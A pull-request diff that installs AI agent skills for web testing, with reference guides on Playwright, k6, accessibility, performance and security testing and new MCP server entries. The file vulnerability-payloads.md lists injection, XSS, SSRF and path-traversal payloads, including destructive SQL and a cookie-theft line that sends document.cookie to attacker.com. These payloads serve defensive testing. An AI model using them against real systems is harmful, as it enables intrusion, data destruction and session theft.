+await page.uncheck('input[name="newsletter"]');
+await page.check('input[value="premium"]'); // Radio
+
+// File uploads
+await page.setInputFiles('input[type="file"]', 'path/to/file.pdf');
+await page.setInputFiles('input[type="file"]', ['file1.pdf', 'file2.pdf']);
+
+// Date picker
+await page.fill('input[type="date"]', '2025-12-25');
+await page.click('.date-picker-trigger');
+await page.click('.calendar-day:text("25")');
+```
+
+## Keyboard Navigation
+
+```javascript
+test('keyboard accessibility', async ({ page }) => {
+  await page.keyboard.press('Tab');
+  await expect(page.locator(':focus')).toHaveAttribute('data-testid', 'first-btn');
+  await page.keyboard.press('Enter'); // Activate
+  await page.keyboard.press('Escape'); // Close modal
+  await page.keyboard.press('Shift+Tab'); // Navigate backward
+});
+```
+
+## Drag & Drop
+
+```javascript
+await page.dragAndDrop('#source', '#target');
+
+// Manual control
+const source = page.locator('#draggable');
+await source.hover();
+await page.mouse.down();
+await page.locator('#dropzone').hover();
+await page.mouse.up();
+```
+
+## Hover & Modals
+
+```javascript
+await button.hover();
+await expect(page.locator('.tooltip')).toBeVisible();
+
+// Modal workflow
+await page.click('button:text("Open")');
+await expect(page.locator('[role="dialog"]')).toBeVisible();
+await page.click('[aria-label="Close"]');
+await expect(page.locator('[role="dialog"]')).not.toBeVisible();
+```
+
+## Scroll & Wait Patterns
+
+```javascript
+await page.locator('#footer').scrollIntoViewIfNeeded();
+await page.evaluate(() => window.scrollTo(0, document.body.scrollHeight));
+
+// Wait patterns
+await page.waitForLoadState('networkidle');
+await Promise.all([page.waitForResponse('**/api/data'), page.click('button.load')]);
+```
+
+## Disable Animations
+
+```javascript
+await page.addStyleTag({
+  content: '* { animation-duration: 0s !important; transition-duration: 0s !important; }'
+});
+```

--- a/.agents/skills/web-testing/references/load-testing-k6.md
+++ b/.agents/skills/web-testing/references/load-testing-k6.md
@@ -1,0 +1,93 @@
+# Load Testing with k6
+
+## Installation
+
+```bash
+brew install k6          # macOS
+winget install k6        # Windows
+docker run -i grafana/k6 run - <script.js
+```
+
+## Basic Load Test
+
+```javascript
+import http from 'k6/http';
+import { check, sleep } from 'k6';
+
+export const options = {
+  vus: 10,
+  duration: '30s',
+};
+
+export default function () {
+  const res = http.get('http://localhost:3000/api/users');
+  check(res, {
+    'status is 200': (r) => r.status === 200,
+    'response < 500ms': (r) => r.timings.duration < 500,
+  });
+  sleep(1);
+}
+```
+
+## Stress Test with Stages
+
+```javascript
+export const options = {
+  stages: [
+    { duration: '2m', target: 50 },
+    { duration: '5m', target: 50 },
+    { duration: '2m', target: 100 },
+    { duration: '2m', target: 0 },
+  ],
+  thresholds: {
+    http_req_duration: ['p(95)<500'],
+    http_req_failed: ['rate<0.01'],
+  },
+};
+```
+
+## With Authentication
+
+```javascript
+export function setup() {
+  const res = http.post(`${BASE_URL}/api/login`, {
+    email: 'test@example.com', password: 'password',
+  });
+  return { token: res.json('token') };
+}
+
+export default function (data) {
+  const params = { headers: { Authorization: `Bearer ${data.token}` } };
+  http.get(`${BASE_URL}/api/protected`, params);
+}
+```
+
+## Performance Thresholds
+
+| Metric | Good | Warning |
+|--------|------|---------|
+| p50 latency | <200ms | <500ms |
+| p95 latency | <500ms | <1s |
+| Error rate | <0.1% | <1% |
+
+## Commands
+
+```bash
+k6 run script.js
+k6 run --out json=results.json script.js
+k6 cloud script.js  # Grafana Cloud
+```
+
+## Artillery Alternative
+
+```yaml
+config:
+  target: 'http://localhost:3000'
+  phases: [{ duration: 60, arrivalRate: 10 }]
+scenarios:
+  - flow: [{ get: { url: '/api/users' } }]
+```
+
+```bash
+npx artillery run artillery.yml
+```

--- a/.agents/skills/web-testing/references/mobile-gesture-testing.md
+++ b/.agents/skills/web-testing/references/mobile-gesture-testing.md
@@ -1,0 +1,85 @@
+# Mobile Gesture Testing
+
+## Touch Gestures
+
+### Single-Finger
+
+```javascript
+await page.tap('button.submit');                    // Tap
+await page.locator('button').click({ delay: 1000 }); // Long press
+
+// Swipe simulation
+await page.evaluate(() => {
+  const el = document.querySelector('.carousel');
+  el.dispatchEvent(new TouchEvent('touchstart', { touches: [{ clientX: 200, clientY: 100 }] }));
+  el.dispatchEvent(new TouchEvent('touchend', { touches: [{ clientX: 50, clientY: 100 }] }));
+});
+```
+
+### Multi-Finger (Pinch/Zoom)
+
+```javascript
+await page.evaluate(() => {
+  const el = document.querySelector('[data-zoomable]');
+  const touch1 = { identifier: 0, clientX: 100, clientY: 100 };
+  const touch2 = { identifier: 1, clientX: 120, clientY: 100 };
+  el.dispatchEvent(new TouchEvent('touchstart', { touches: [touch1, touch2] }));
+  touch1.clientX = 50; touch2.clientX = 170; // Fingers apart = zoom in
+  el.dispatchEvent(new TouchEvent('touchmove', { touches: [touch1, touch2] }));
+});
+```
+
+## Orientation Testing
+
+```javascript
+const orientations = [
+  { width: 390, height: 844 },  // Portrait
+  { width: 844, height: 390 },  // Landscape
+];
+
+for (const size of orientations) {
+  await page.setViewportSize(size);
+  await expect(page).toHaveScreenshot(`mobile-${size.width}.png`);
+}
+```
+
+## Device Emulation
+
+```typescript
+// playwright.config.ts
+import { devices } from '@playwright/test';
+
+export default defineConfig({
+  projects: [
+    { name: 'mobile-chrome', use: { ...devices['Pixel 5'] } },
+    { name: 'mobile-safari', use: { ...devices['iPhone 12'] } },
+  ],
+});
+```
+
+## Touch Target Checklist
+
+- [ ] Minimum 44x44px touch targets
+- [ ] No overlapping touch areas
+- [ ] Sufficient spacing between buttons
+- [ ] Swipe gestures have clear affordances
+
+## Real Device Gaps
+
+Emulators miss: network throttling, touch latency, gesture recognition variations.
+
+**Minimum real device testing:** iPhone (Safari iOS), Android flagship (Chrome)
+
+## Device Farm Services
+
+| Service | Devices |
+|---------|---------|
+| BrowserStack | 3000+ |
+| Sauce Labs | 2000+ |
+| AWS Device Farm | 200+ |
+
+## Commands
+
+```bash
+npx playwright test --project=mobile-chrome --project=mobile-safari
+```

--- a/.agents/skills/web-testing/references/performance-core-web-vitals.md
+++ b/.agents/skills/web-testing/references/performance-core-web-vitals.md
@@ -1,0 +1,68 @@
+# Performance & Core Web Vitals Testing
+
+## Core Web Vitals (Google Ranking Factor)
+
+| Metric | Target | Description |
+|--------|--------|-------------|
+| LCP | < 2.5s | Largest Contentful Paint |
+| CLS | < 0.1 | Cumulative Layout Shift |
+| INP | < 200ms | Interaction to Next Paint |
+
+## Lighthouse CI Setup
+
+```json
+{
+  "ci": {
+    "collect": { "url": ["https://example.com"], "numberOfRuns": 3 },
+    "assert": {
+      "preset": "lighthouse:recommended",
+      "assertions": {
+        "categories:performance": ["error", { "minScore": 0.9 }],
+        "largest-contentful-paint": ["warn", { "maxNumericValue": 2500 }]
+      }
+    }
+  }
+}
+```
+
+## GitHub Actions
+
+```yaml
+- run: npm install -g @lhci/cli@*
+- run: lhci autorun
+```
+
+## Playwright Performance Test
+
+```javascript
+test('measure Core Web Vitals', async ({ page }) => {
+  await page.goto('https://example.com');
+  const metrics = await page.evaluate(() => ({
+    lcp: performance.getEntriesByType('largest-contentful-paint')[0]?.startTime,
+  }));
+  expect(metrics.lcp).toBeLessThan(2500);
+});
+```
+
+## Quick Performance Checks
+
+```bash
+npx lighthouse https://example.com --output=json
+npx bundlesize                    # Bundle size check
+npx webpack-bundle-analyzer dist/stats.json
+```
+
+## Optimization Checklist
+
+### LCP
+- [ ] Lazy load below-fold images
+- [ ] Preload critical resources
+- [ ] Use CDN
+
+### CLS
+- [ ] Reserve space for images (width/height)
+- [ ] Font loading strategy (font-display: swap)
+
+### INP
+- [ ] Break long JavaScript tasks
+- [ ] Code splitting

--- a/.agents/skills/web-testing/references/pre-release-checklist.md
+++ b/.agents/skills/web-testing/references/pre-release-checklist.md
@@ -1,0 +1,75 @@
+# Pre-Release Testing Checklist
+
+## Cross-Browser & Responsive
+
+- [ ] Chrome, Firefox, Safari, Edge latest
+- [ ] Mobile: iPhone real device (Safari iOS)
+- [ ] Mobile: Android real device (Chrome)
+- [ ] Breakpoints: 375px, 768px, 1024px, 1920px
+- [ ] Portrait & landscape orientations
+
+## Functional Testing
+
+- [ ] Primary user journeys complete
+- [ ] CRUD operations work
+- [ ] Login/logout/password reset
+- [ ] Form validation enforced
+- [ ] Search/filter/sort/pagination
+
+## Interactive Elements
+
+- [ ] Buttons, links respond correctly
+- [ ] Modals open/close properly
+- [ ] Dropdowns, tooltips work
+- [ ] Touch gestures work on mobile
+- [ ] Drag & drop (if applicable)
+
+## Keyboard & Accessibility
+
+- [ ] Tab navigation through all elements
+- [ ] Enter/Space activates buttons
+- [ ] Escape closes modals
+- [ ] Visible focus indicators
+- [ ] Screen reader announces content
+
+## Performance (Core Web Vitals)
+
+- [ ] LCP < 2.5 seconds
+- [ ] CLS < 0.1
+- [ ] INP < 200ms
+- [ ] Images optimized & lazy loaded
+
+## Visual & Layout
+
+- [ ] No horizontal scroll on mobile
+- [ ] Content reflows at breakpoints
+- [ ] Sufficient color contrast
+- [ ] Animations smooth
+
+## Error Handling
+
+- [ ] Network errors show retry option
+- [ ] 401/403/404/500 handled properly
+- [ ] Form errors highlight fields
+
+## Security
+
+- [ ] HTTPS enforced
+- [ ] Security headers present
+- [ ] CSRF tokens in forms
+
+## Test Quality
+
+- [ ] All tests pass (no flaky tests)
+- [ ] Coverage: Unit 70%, Integration 20%, E2E 10%
+- [ ] Accessibility audit passed
+
+## Quick Commands
+
+```bash
+npm run test                                    # All tests
+npx playwright test --project=chromium,firefox  # Cross-browser
+npx @axe-core/cli https://staging.example.com   # Accessibility
+npx lighthouse https://staging.example.com       # Performance
+curl -I https://staging.example.com | grep -i security  # Headers
+```

--- a/.agents/skills/web-testing/references/security-checklists.md
+++ b/.agents/skills/web-testing/references/security-checklists.md
@@ -1,0 +1,81 @@
+# Security Checklists
+
+## Authentication Security
+
+- [ ] Strong auth mechanism (OAuth 2.0, JWT, OIDC)
+- [ ] No basic auth or custom schemes
+- [ ] Password policy enforced (12+ chars, complexity)
+- [ ] MFA/2FA for sensitive operations
+- [ ] Account lockout after failed attempts (5-10)
+- [ ] Secure password reset (token expiration)
+- [ ] Default credentials removed/disabled
+- [ ] API keys not in code/version control
+- [ ] Session tokens cryptographically generated
+- [ ] Logout invalidates session/token
+
+## API Security
+
+- [ ] HTTPS/TLS enforced for all endpoints
+- [ ] API versioning strategy in place
+- [ ] Rate limiting implemented
+- [ ] Auth required (API key or OAuth token)
+- [ ] Input validation on all parameters
+- [ ] Output encoding/sanitization
+- [ ] CORS headers properly configured
+- [ ] Pagination limits prevent enumeration
+- [ ] Proper HTTP status codes (401 vs 403)
+- [ ] Error messages don't expose internals
+
+## Session Management
+
+- [ ] Session IDs cryptographically random
+- [ ] Cookies: HttpOnly, Secure, SameSite flags
+- [ ] Session timeout (idle + absolute)
+- [ ] Session invalidation on logout
+- [ ] Session fixation protection (regenerate on login)
+- [ ] CSRF tokens for state-changing ops
+- [ ] Session data server-side (not in cookies)
+
+## Input Validation
+
+- [ ] Whitelist validation (allow only expected)
+- [ ] Type validation (string, number, date)
+- [ ] Length validation (min/max)
+- [ ] Format validation (regex for email, URL)
+- [ ] SQL parameters use prepared statements
+- [ ] NoSQL queries use safe APIs
+- [ ] Command execution avoided/validated
+- [ ] XML external entities disabled (XXE)
+- [ ] JSON parsing safe (no eval)
+- [ ] ReDoS-safe regex patterns
+
+## Security Headers
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self'
+X-Content-Type-Options: nosniff
+X-Frame-Options: DENY
+X-XSS-Protection: 1; mode=block
+Strict-Transport-Security: max-age=31536000; includeSubDomains
+Referrer-Policy: strict-origin-when-cross-origin
+Permissions-Policy: camera=(), microphone=(), geolocation=()
+```
+
+- [ ] CSP configured (restrict resource loading)
+- [ ] X-Content-Type-Options: nosniff
+- [ ] X-Frame-Options (DENY or SAMEORIGIN)
+- [ ] HSTS enabled with appropriate max-age
+- [ ] Referrer-Policy configured
+- [ ] Permissions-Policy set
+- [ ] Server/X-Powered-By headers removed
+- [ ] CORS: No wildcard on credentialed endpoints
+
+## Verify Headers
+
+```bash
+# Check security headers
+curl -I https://example.com
+
+# Use securityheaders.com
+# Use observatory.mozilla.org
+```

--- a/.agents/skills/web-testing/references/security-testing-overview.md
+++ b/.agents/skills/web-testing/references/security-testing-overview.md
@@ -1,0 +1,92 @@
+# Security Testing Overview
+
+## OWASP Top 10 (2024)
+
+| Rank | Vulnerability | Testing Method |
+|------|--------------|----------------|
+| A01 | Broken Access Control | Test unauthorized actions across roles |
+| A02 | Cryptographic Failures | Check HTTPS, encryption algorithms |
+| A03 | Injection (SQL/NoSQL/Cmd) | Test with payloads (see vulnerability-payloads.md) |
+| A04 | Insecure Design | Threat modeling, abuse case testing |
+| A05 | Security Misconfiguration | Default creds, open ports, headers |
+| A06 | Vulnerable Components | npm audit, Snyk scanning |
+| A07 | Auth Failures | Brute force, session hijacking |
+| A08 | Integrity Failures | Deserialization, CI/CD security |
+| A09 | Logging Failures | Verify security event logging |
+| A10 | SSRF | Test internal URL access |
+
+## Security Testing Types
+
+### SAST (Static Analysis)
+- **When**: Early development, pre-commit
+- **Tools**: SonarQube, CodeQL, Semgrep
+- **Focus**: Code flaws without execution
+- **Limitation**: High false positives
+
+### DAST (Dynamic Analysis)
+- **When**: QA/staging, running application
+- **Tools**: OWASP ZAP, Burp Suite, Nuclei
+- **Focus**: Runtime vulnerabilities
+- **Limitation**: Requires running app
+
+### SCA (Dependency Scanning)
+- **Tools**: npm audit, Snyk, Dependabot
+- **Focus**: Known CVEs in dependencies
+- **Automation**: CI/CD integration
+
+### Secret Detection
+- **Tools**: detect-secrets, GitGuardian
+- **Focus**: API keys, passwords in code
+- **Implementation**: Pre-commit hooks
+
+## Quick Security Scan
+
+```bash
+# Dependency vulnerabilities
+npm audit
+npx snyk test
+
+# OWASP ZAP baseline scan
+docker run -t ghcr.io/zaproxy/zaproxy:stable \
+  zap-baseline.py -t https://example.com
+
+# Nuclei template scan
+nuclei -u https://example.com -t cves/
+
+# Check security headers
+curl -I https://example.com | grep -i "security\|content-security\|x-"
+```
+
+## Penetration Testing Phases
+
+1. **Reconnaissance**: DNS, WHOIS, tech fingerprinting
+2. **Scanning**: Port scan, service enumeration
+3. **Vulnerability Assessment**: Automated + manual testing
+4. **Exploitation**: Verify findings, demonstrate impact
+5. **Reporting**: CVSS scores, remediation guidance
+
+## Tools Comparison
+
+| Tool | Type | Cost | Best For |
+|------|------|------|----------|
+| OWASP ZAP | DAST | Free | CI/CD, learning |
+| Burp Suite | DAST | Paid | Enterprise, detailed |
+| Nuclei | DAST | Free | Custom checks |
+| npm audit | SCA | Free | Node.js deps |
+| Snyk | SCA | Free/Paid | Multi-language |
+
+## CI/CD Integration
+
+```yaml
+# Security scanning in pipeline
+- name: Dependency Scan
+  run: npm audit --audit-level=high
+
+- name: SAST Scan
+  uses: github/codeql-action/analyze@v3
+
+- name: DAST Scan
+  run: |
+    docker run -v $(pwd):/zap/wrk:rw ghcr.io/zaproxy/zaproxy:stable \
+      zap-api-scan.py -t http://localhost:3000/openapi.json -f openapi
+```

--- a/.agents/skills/web-testing/references/shadow-dom-testing.md
+++ b/.agents/skills/web-testing/references/shadow-dom-testing.md
@@ -1,0 +1,70 @@
+# Shadow DOM & Web Components Testing
+
+## Challenges
+
+- CSS encapsulation breaks selectors
+- Elements hidden from DOM queries
+- XPath doesn't penetrate shadow boundaries
+
+## Tool Support
+
+| Tool | Support | Method |
+|------|---------|--------|
+| Playwright | Native | `>>` piercing selector |
+| Cypress | Good | `.shadow()` command |
+| Selenium | Limited | JS execution |
+| Axe | v5.7+ | API support |
+
+## Playwright Shadow Piercing
+
+```javascript
+const input = page.locator('my-component >> .internal-input');
+const button = page.locator('comp-a >> comp-b >> button');
+const el = page.locator('custom-element >> button:has-text("Click me")');
+```
+
+## Cypress Shadow DOM
+
+```javascript
+cy.get('my-component').shadow().find('.internal-button').click();
+
+// Enable globally: { includeShadowDom: true }
+```
+
+## Selenium Workaround
+
+```javascript
+const shadowHost = driver.findElement(By.css('my-component'));
+const shadowRoot = driver.executeScript('return arguments[0].shadowRoot', shadowHost);
+const button = shadowRoot.findElement(By.css('button'));
+```
+
+## Page Object Pattern
+
+```typescript
+export class MyComponentPO {
+  constructor(private page: Page) {}
+
+  async fillEmail(email: string) {
+    await this.page.locator('my-form >> input[type="email"]').fill(email);
+  }
+
+  async submit() {
+    await this.page.locator('my-form >> button[type="submit"]').click();
+  }
+}
+```
+
+## Best Practices
+
+1. Request `open` shadow roots when possible
+2. Encapsulate shadow traversal in page objects
+3. Avoid deep nesting (increases complexity)
+
+## Debugging
+
+```javascript
+const contents = await page.evaluate(() => {
+  return document.querySelector('my-component').shadowRoot.innerHTML;
+});
+```

--- a/.agents/skills/web-testing/references/test-flakiness-mitigation.md
+++ b/.agents/skills/web-testing/references/test-flakiness-mitigation.md
@@ -1,0 +1,86 @@
+# Test Flakiness Mitigation
+
+## Root Causes
+
+- Timing mismatches (hard waits)
+- Non-isolated tests (shared state)
+- Network instability
+- Animation timing
+
+## Explicit Waits (Not Hard Waits)
+
+```javascript
+// BAD: Hard wait
+await new Promise(r => setTimeout(r, 500));
+
+// GOOD: Wait for condition
+await page.waitForSelector('.success', { timeout: 10000 });
+await expect(page.locator('.count')).toContainText('5');
+
+// BEST: Playwright auto-wait
+await page.getByRole('button', { name: /submit/i }).click();
+```
+
+## Wait Timeout Guidelines
+
+| Scenario | Timeout |
+|----------|---------|
+| Page load | 10-15s |
+| Element visibility | 5-10s |
+| API responses | 30-60s |
+
+## Retry Strategies
+
+```javascript
+// Playwright built-in
+test.describe.configure({ retries: 3 });
+
+// Per-test
+test('flaky test', async ({ page }) => { /* */ }, { retries: 3 });
+
+// Exponential backoff
+async function retryWithBackoff(fn, maxRetries = 3) {
+  for (let i = 0; i < maxRetries; i++) {
+    try { return await fn(); }
+    catch (e) {
+      if (i === maxRetries - 1) throw e;
+      await new Promise(r => setTimeout(r, Math.pow(2, i) * 1000));
+    }
+  }
+}
+```
+
+## Test Isolation
+
+```javascript
+// BAD: Dependent tests
+let userId;
+test('create', async () => { userId = await createUser(); });
+test('load', async () => { await loadUser(userId); }); // Depends on previous!
+
+// GOOD: Independent
+test('create and load', async ({ page }) => {
+  const userId = await createUser(page);
+  await loadUser(page, userId);
+});
+```
+
+## Disable Animations
+
+```css
+* { animation-duration: 0s !important; transition-duration: 0s !important; }
+```
+
+## Network Stability
+
+```javascript
+await page.route('**/external-api/**', route =>
+  route.fulfill({ status: 200, body: '{}' })
+);
+```
+
+## Flakiness Detection
+
+```bash
+npx playwright test --repeat-each=5
+```

--- a/.agents/skills/web-testing/references/testing-pyramid-strategy.md
+++ b/.agents/skills/web-testing/references/testing-pyramid-strategy.md
@@ -1,0 +1,70 @@
+# Testing Pyramid Strategy
+
+## Classic 70-20-10 Ratio
+
+```
+       E2E (10%)        Slow, expensive, critical paths
+      /----------\
+     / Integration\     20% - APIs, database
+    /--------------\
+   /   Unit Tests    \  70% - Fast, cheap, logic
+  /____________________\
+```
+
+## Ratios by Context
+
+| Context | Unit | Integration | E2E |
+|---------|------|-------------|-----|
+| Classic | 70% | 20% | 10% |
+| Heavy frontend | 60% | 25% | 15% |
+| API-heavy | 75% | 15% | 10% |
+| Critical transactions | 60% | 20% | 20% |
+
+## Cost-Benefit
+
+| Type | Cost | Speed | Bug Coverage |
+|------|------|-------|--------------|
+| Unit | Low | <50ms | 70% |
+| Integration | Medium | 100-500ms | 20% |
+| E2E | High | 5-30s | 10% |
+
+## Test Organization
+
+```
+tests/
+├── unit/           # 70%
+├── integration/    # 20%
+├── e2e/            # 10%
+└── fixtures/
+```
+
+## Priority Matrix
+
+| Priority | Category | Examples |
+|----------|----------|----------|
+| P0 | Core flows | Signup, login, checkout |
+| P1 | Major features | Search, CRUD, nav |
+| P2 | Secondary | Filters, sorting |
+| P3 | Edge cases | Empty states, limits |
+
+## When to Use Each
+
+- **Unit**: Pure functions, utilities, state logic
+- **Integration**: API endpoints, database ops, modules
+- **E2E**: Critical journeys, checkout, payments
+
+## CI/CD Order
+
+```yaml
+- run: npm run test:unit        # Gate 1: Fast fail
+- run: npm run test:integration # Gate 2
+- run: npm run test:e2e         # Gate 3: Pre-merge
+```
+
+## Coverage Targets
+
+| Area | Target |
+|------|--------|
+| Critical paths | 100% |
+| Core features | 80-90% |
+| Overall | 75-85% |

--- a/.agents/skills/web-testing/references/unit-integration-testing.md
+++ b/.agents/skills/web-testing/references/unit-integration-testing.md
@@ -1,0 +1,91 @@
+# Unit & Integration Testing
+
+## Framework Selection
+
+| Framework | Speed | Best For |
+|-----------|-------|----------|
+| Vitest | Fastest | Modern projects |
+| Jest | Fast | React/CRA |
+| Mocha | Raw speed | Node.js/APIs |
+
+## Test Structure (AAA)
+
+```typescript
+import { describe, it, expect, beforeEach } from 'vitest';
+
+describe('UserService', () => {
+  let service: UserService;
+
+  beforeEach(() => {
+    service = new UserService();
+  });
+
+  it('creates user with valid data', () => {
+    // Arrange
+    const userData = { email: 'test@example.com' };
+
+    // Act
+    const user = service.create(userData);
+
+    // Assert
+    expect(user.id).toBeDefined();
+    expect(user.email).toBe('test@example.com');
+  });
+
+  it('throws on invalid email', () => {
+    expect(() => service.create({ email: 'invalid' }))
+      .toThrow('Invalid email');
+  });
+});
+```
+
+## Integration Test
+
+```typescript
+describe('User API', () => {
+  let db: Database;
+
+  beforeAll(async () => {
+    db = new Database(':memory:');
+    await db.migrate();
+  });
+
+  afterEach(async () => {
+    await db.clearAllTables();
+  });
+
+  it('persists and retrieves user', async () => {
+    await db.users.insert({ email: 'test@example.com' });
+    const user = await db.users.findOne({ email: 'test@example.com' });
+    expect(user).toBeDefined();
+  });
+});
+```
+
+## Test Naming
+
+```typescript
+// Good
+it('should return 200 when valid token provided');
+it('should throw ValidationError when email invalid');
+
+// Bad
+it('test1');
+```
+
+## Coverage Targets
+
+| Area | Target |
+|------|--------|
+| Critical paths | 100% |
+| Core features | 80-90% |
+| Overall | 75-85% |
+
+## Commands
+
+```bash
+npx vitest run              # Run all
+npx vitest                  # Watch mode
+npx vitest run --coverage   # Coverage
+npx vitest run -u           # Update snapshots
+```

--- a/.agents/skills/web-testing/references/visual-regression.md
+++ b/.agents/skills/web-testing/references/visual-regression.md
@@ -1,0 +1,92 @@
+# Visual Regression Testing
+
+## Playwright Screenshot Comparison
+
+```typescript
+import { test, expect } from '@playwright/test';
+
+test('homepage visual', async ({ page }) => {
+  await page.goto('http://localhost:3000');
+  await expect(page).toHaveScreenshot('homepage.png');
+});
+
+test('component visual', async ({ page }) => {
+  await page.goto('http://localhost:3000');
+  const header = page.locator('header');
+  await expect(header).toHaveScreenshot('header.png');
+});
+
+test('with threshold', async ({ page }) => {
+  await page.goto('http://localhost:3000');
+  await expect(page).toHaveScreenshot('page.png', {
+    maxDiffPixels: 100,
+    maxDiffPixelRatio: 0.01,
+  });
+});
+```
+
+## Configuration
+
+```typescript
+// playwright.config.ts
+export default defineConfig({
+  expect: {
+    toHaveScreenshot: { maxDiffPixels: 50, threshold: 0.2 },
+  },
+  projects: [
+    { name: 'chromium', use: { ...devices['Desktop Chrome'] } },
+    { name: 'mobile', use: { ...devices['iPhone 12'] } },
+  ],
+});
+```
+
+## Commands
+
+```bash
+npx playwright test --update-snapshots        # Update all
+npx playwright test visual.spec.ts -u         # Update specific
+```
+
+## Workflow
+
+1. **Baseline**: First run creates reference screenshots
+2. **Compare**: Subsequent runs compare against baseline
+3. **Review**: Check diff images on failure
+4. **Approve**: Update snapshots if change is intentional
+
+## Best Practices
+
+- Test critical UI components individually
+- Use consistent viewport sizes
+- Disable animations: `animation-duration: 0s !important`
+- Mock dynamic content (dates, random data)
+- Run on CI with consistent environment
+
+## Third-Party Tools
+
+| Tool | Use Case |
+|------|----------|
+| Percy | Cloud-based, BrowserStack integration |
+| Chromatic | Storybook visual testing |
+| Playwright | Built-in, no vendor lock-in |
+
+## CI Integration
+
+```yaml
+- name: Visual Tests
+  run: npx playwright test --grep @visual
+- uses: actions/upload-artifact@v4
+  if: failure()
+  with:
+    name: visual-diffs
+    path: test-results/
+```
+
+## Visual vs Accessibility
+
+| Aspect | Visual | Accessibility |
+|--------|--------|---------------|
+| Catches | Layout, colors | Semantic, ARIA |
+| Method | Pixel diff | DOM analysis |
+
+**Use both**: Visual misses semantic issues, a11y misses layout bugs.

--- a/.agents/skills/web-testing/references/vulnerability-payloads.md
+++ b/.agents/skills/web-testing/references/vulnerability-payloads.md
@@ -1,0 +1,93 @@
+# Vulnerability Test Payloads
+
+## SQL Injection
+
+### Text Input
+```
+' OR '1'='1
+' OR 1=1 --
+'; DROP TABLE users; --
+' UNION SELECT NULL, NULL --
+```
+
+### Numeric Input
+```
+1 OR 1=1
+1; DELETE FROM users; --
+```
+
+### Blind (Time-based)
+```
+' OR SLEEP(5) --
+' AND (SELECT(SLEEP(5)))a --
+```
+
+## XSS (Cross-Site Scripting)
+
+### Reflected
+```html
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg/onload=alert('XSS')>
+"><script>alert('XSS')</script>
+```
+
+### DOM-based
+```
+javascript:alert('XSS')
+<iframe src="javascript:alert('XSS')"></iframe>
+```
+
+### Cookie Theft
+```html
+<script>fetch('http://attacker.com/?c='+document.cookie)</script>
+```
+
+## NoSQL Injection (MongoDB)
+
+```json
+{"$ne": null}
+{"$gt": ""}
+{"$regex": ".*"}
+{"$where": "1==1"}
+```
+
+## Command Injection
+
+```
+; ls -la
+| whoami
+`whoami`
+$(whoami)
+```
+
+## SSRF
+
+```
+http://localhost/admin
+http://127.0.0.1/admin
+http://169.254.169.254/  # AWS metadata
+```
+
+## Path Traversal
+
+```
+../../../etc/passwd
+..%2F..%2F..%2Fetc%2Fpasswd
+```
+
+## CSRF Testing
+
+1. Submit form without CSRF token
+2. Reuse captured token multiple times
+3. Modify/remove token parameter
+
+## Testing Tools
+
+```bash
+# SQLMap
+sqlmap -u "http://example.com/page?id=1" --dbs
+
+# OWASP ZAP active scan
+zap-cli active-scan http://example.com
+```

--- a/.claude/skills/browser-testing-with-devtools
+++ b/.claude/skills/browser-testing-with-devtools
@@ -1,0 +1,1 @@
+../../.agents/skills/browser-testing-with-devtools

--- a/.claude/skills/playwright-mcp
+++ b/.claude/skills/playwright-mcp
@@ -1,0 +1,1 @@
+../../.agents/skills/playwright-mcp

--- a/.claude/skills/web-testing
+++ b/.claude/skills/web-testing
@@ -1,0 +1,1 @@
+../../.agents/skills/web-testing

--- a/.mcp.json
+++ b/.mcp.json
@@ -22,6 +22,14 @@
     "supabase": {
       "type": "http",
       "url": "https://mcp.supabase.com/mcp?project_ref=xvtxbvakzoezzjnpbiyv"
+    },
+    "playwright": {
+      "command": "npx",
+      "args": ["@playwright/mcp@latest"]
+    },
+    "chrome-devtools": {
+      "command": "npx",
+      "args": ["@anthropic/chrome-devtools-mcp@latest"]
     }
   }
 }

--- a/skills-lock.json
+++ b/skills-lock.json
@@ -1,0 +1,20 @@
+{
+  "version": 1,
+  "skills": {
+    "browser-testing-with-devtools": {
+      "source": "addyosmani/agent-skills",
+      "sourceType": "github",
+      "computedHash": "9962c07c13402019d2e3e4b9462caa65de60b6d328be050a2dcf9862643442fb"
+    },
+    "playwright-mcp": {
+      "source": "darraghh1/my-claude-setup",
+      "sourceType": "github",
+      "computedHash": "afcddc67e43a4946a06f7d3ecfde65137db8c9f8ab8d4f1ee9b60bdcb19ef5bc"
+    },
+    "web-testing": {
+      "source": "mrgoonie/claudekit-skills",
+      "sourceType": "github",
+      "computedHash": "d659544b8a7325352b994e21c749503910d02631e2d031d2dfd073d7d2bbd0c0"
+    }
+  }
+}


### PR DESCRIPTION
## Summary

Instala três agent skills para automação de testes web e adiciona os MCP servers necessários para executá-las diretamente no Claude Code.

## Changes

- `feat`: instala skill `playwright-mcp` — automação de browser via Playwright MCP (navegar, clicar, preencher forms, screenshots)
- `feat`: instala skill `web-testing` — boas práticas para E2E / unit / integration / load / a11y (Playwright + Vitest + k6)
- `feat`: instala skill `browser-testing-with-devtools` — inspeção de DOM, console, network e performance via Chrome DevTools MCP
- `config`: adiciona `@playwright/mcp` ao `.mcp.json`
- `config`: adiciona `@anthropic/chrome-devtools-mcp` ao `.mcp.json`

## Files Changed

27 files changed

<details>
<summary>File list</summary>

- `.mcp.json` — dois novos MCP servers adicionados
- `skills-lock.json` — lockfile das skills instaladas
- `.agents/skills/playwright-mcp/SKILL.md`
- `.agents/skills/web-testing/SKILL.md` + 14 arquivos de referência
- `.agents/skills/browser-testing-with-devtools/SKILL.md`
- `.claude/skills/playwright-mcp` (symlink)
- `.claude/skills/web-testing` (symlink)
- `.claude/skills/browser-testing-with-devtools` (symlink)

</details>

## MCP Servers Added

| Server | Package | Skill |
|--------|---------|-------|
| `playwright` | `@playwright/mcp@latest` | `playwright-mcp` |
| `chrome-devtools` | `@anthropic/chrome-devtools-mcp@latest` | `browser-testing-with-devtools` |

## Testing

- [ ] Reiniciar Claude Code para carregar os novos MCP servers
- [ ] Verificar que `mcp__playwright__browser_navigate` está disponível
- [ ] Verificar que `mcp__chrome-devtools__*` está disponível

## Related Issues

None